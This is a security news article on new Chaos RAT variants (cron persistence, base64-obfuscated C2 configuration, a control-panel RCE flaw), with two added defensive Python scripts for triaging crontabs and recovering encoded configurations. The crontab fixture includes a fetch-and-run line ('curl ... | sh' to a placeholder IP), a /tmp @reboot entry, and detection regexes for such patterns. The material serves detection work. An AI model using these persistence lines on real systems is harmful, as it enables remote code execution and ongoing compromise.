Open Source Tool Becomes Stealthy Cross Platform Malware


New variants with enhanced stealth, persistent access, and a critical vulnerability in its admin panel — marking a dangerous turn in open-source software misuse.


Security researchers at Acronis Threat Research Unit (TRU) have identified new and more sophisticated versions of Chaos RAT, a once-legitimate open-source remote administration tool that has now become a weapon in cybercriminal campaigns targeting both Windows and Linux systems. Originally released in 2022 as a Golang-based cross-platform management utility on GitHub, Chaos RAT was designed for legitimate remote administration. However, its ease of use, flexibility, and minimal detection footprint quickly drew the attention of threat actors. 


The latest samples, discovered in 2025, show significant improvements, including enhanced system compatibility, better obfuscation techniques, and stealth features that allow it to operate undetected. Despite its limited deployment compared to mainstream malware, Chaos RAT’s ability to maintain persistent access and evade detection makes it an appealing tool for cybercriminals involved in espionage, data theft, and ransomware deployment.

Researchers also revealed a serious vulnerability in Chaos RAT’s web-based control panel. This flaw enables attackers to execute code remotely on servers running the panel, potentially allowing one attacker to seize control of infrastructure operated by other malicious actors. While this doesn’t directly harm victims’ devices, it raises red flags about the insecure design practices within some open-source tools.


In one recent sample submitted from India to VirusTotal, an archive file named NetworkAnalyzer.tar.gz carried the Chaos RAT payload. Though it’s unclear how the victim received the file, researchers believe it was disguised as a Linux network diagnostic tool, likely delivered via phishing emails or compromised websites. Early attack campaigns used techniques such as modifying system files and embedding cron jobs to ensure ongoing communication with attacker-controlled servers.
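The cron-based persistence described above leaves a footprint a defender can check for: scheduled entries that fetch from a remote address and pipe the result into a shell, or that run a payload out of a world-writable directory. The script below is an added example, not code from the article or from Acronis TRU; the crontab text is constructed for illustration, and the indicators it flags are assumptions about what a reviewer would look for, not details taken from the report.

```python
"""Triage crontab entries for the persistence pattern described above.

Added example, not code from the article or from Acronis TRU. The crontab
text below is constructed; the indicators (remote fetch piped into a shell,
payloads run from world-writable directories) are assumed review heuristics.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample: a mix of ordinary entries and two suspicious ones.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/15 * * * * /usr/local/bin/backup.sh
*/5 * * * * curl -fsSL http://203.0.113.10/update.sh | sh
@reboot /tmp/.netanalyzer/run >/dev/null 2>&1
30 1 * * 0 /usr/bin/apt-get update -qq
"""

# Downloaders, shells they may be piped into, directories a persisted
# payload should not normally live in, and hard-coded remote addresses.
FETCH_RE = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(ba|z|da)?sh\b")
WRITABLE_DIR_RE = re.compile(r"(^|\s)/(tmp|dev/shm|var/tmp)/")
URL_OR_IP_RE = re.compile(r"https?://\S+|\b\d{1,3}(?:\.\d{1,3}){3}\b")


@dataclass
class Finding:
    line_no: int
    schedule: str
    command: str
    reasons: list[str]


def parse_entry(line: str) -> tuple[str, str] | None:
    """Split a crontab line into (schedule, command); None for comments, blanks, env lines."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#") or "=" in stripped.split()[0]:
        return None
    if stripped.startswith("@"):          # @reboot, @daily, ...
        parts = stripped.split(None, 1)
    else:                                 # five time fields, then the command
        fields = stripped.split(None, 5)
        if len(fields) < 6:
            return None
        parts = [" ".join(fields[:5]), fields[5]]
    if len(parts) < 2:
        return None
    return parts[0], parts[1]


def triage_crontab(text: str) -> list[Finding]:
    """Return entries matching any of the persistence indicators, with the reasons."""
    findings: list[Finding] = []
    for n, line in enumerate(text.splitlines(), start=1):
        entry = parse_entry(line)
        if entry is None:
            continue
        schedule, command = entry
        reasons = []
        if FETCH_RE.search(command) and PIPE_TO_SHELL_RE.search(command):
            reasons.append("remote script piped directly into a shell")
        if FETCH_RE.search(command) and URL_OR_IP_RE.search(command):
            reasons.append("scheduled fetch from a hard-coded remote address")
        if WRITABLE_DIR_RE.search(command):
            reasons.append("executes from a world-writable directory")
        if reasons:
            findings.append(Finding(n, schedule, command, reasons))
    return findings


if __name__ == "__main__":
    for f in triage_crontab(SAMPLE_CRONTAB):
        print(f"line {f.line_no}: [{f.schedule}] {f.command}")
        for r in f.reasons:
            print(f"    - {r}")
```

Run against real systems, the same function can be fed the output of `crontab -l` per user plus the contents of `/etc/cron.d`; the heuristics are deliberately simple and will produce false positives on legitimate update scripts, so treat hits as items to review rather than verdicts.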

This allows the malware to be updated without needing to re-infect systems, a strategy also used in campaigns that previously deployed crypto miners. The latest variant obscures configuration details like IP addresses and ports in a base64-encoded string, an upgrade from earlier versions that stored such data in plain text. This change makes analysis and reverse engineering more challenging, highlighting Chaos RAT’s shift from an open-source utility to a sophisticated cyber threat.
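Base64-encoding a configuration hides it from a plain `strings` pass, but an analyst can still recover it by locating runs of base64 alphabet characters, decoding the ones that validate, and keeping those that look like a network configuration. The script below is an added example, not code from the article or from Acronis TRU; the "binary" blob and the JSON-shaped configuration inside it are constructed, and the field names `host` and `port` are assumptions for illustration, since the article does not describe the real variant's configuration layout.

```python
"""Recover a base64-encoded configuration string from a binary blob.

Added example, not code from the article or from Acronis TRU. The blob and
the JSON-shaped configuration inside it are constructed; the field names
(host, port) are assumptions, not the real variant's layout.
"""
from __future__ import annotations

import base64
import binascii
import json
import re

# Constructed sample "binary": header bytes and ordinary strings, with one
# base64 run that encodes an IP address and port (documentation-range IP).
_CONFIG_PLAINTEXT = json.dumps({"host": "198.51.100.23", "port": "8080"})
SAMPLE_BLOB = (
    b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 16
    + b'Go build ID: "constructed-example"\x00'
    + b"runtime.main\x00net/http\x00"
    + base64.b64encode(_CONFIG_PLAINTEXT.encode()) + b"\x00"
    + b"aGVsbG8=\x00"            # short base64 ("hello"): valid, but not config
    + b"/usr/lib/locale\x00" + b"\xde\xad\xbe\xef" * 8
)

# Runs of at least 20 base64-alphabet bytes, optionally padded.
BASE64_RUN_RE = re.compile(rb"[A-Za-z0-9+/]{20,}={0,2}")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def candidate_base64_runs(blob: bytes) -> list[bytes]:
    """Return byte runs that have base64's alphabet and padding shape."""
    return [m.group(0) for m in BASE64_RUN_RE.finditer(blob)]


def try_decode(run: bytes) -> str | None:
    """Decode a run if it is strictly valid base64 and yields printable ASCII."""
    try:
        raw = base64.b64decode(run, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


def extract_configs(blob: bytes) -> list[dict]:
    """Decoded runs containing an IPv4 address, parsed as JSON where possible."""
    results: list[dict] = []
    for run in candidate_base64_runs(blob):
        text = try_decode(run)
        if text is None or not IPV4_RE.search(text):
            continue
        try:
            results.append(json.loads(text))
        except json.JSONDecodeError:
            results.append({"raw": text})
    return results


if __name__ == "__main__":
    for cfg in extract_configs(SAMPLE_BLOB):
        print("recovered configuration:", cfg)
```

The IPv4 filter is what separates a configuration from the many other base64 runs a real Go binary contains (embedded certificates, build metadata); when a sample stores hostnames instead of addresses, widen that filter rather than dropping it, or the false-positive rate climbs quickly.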
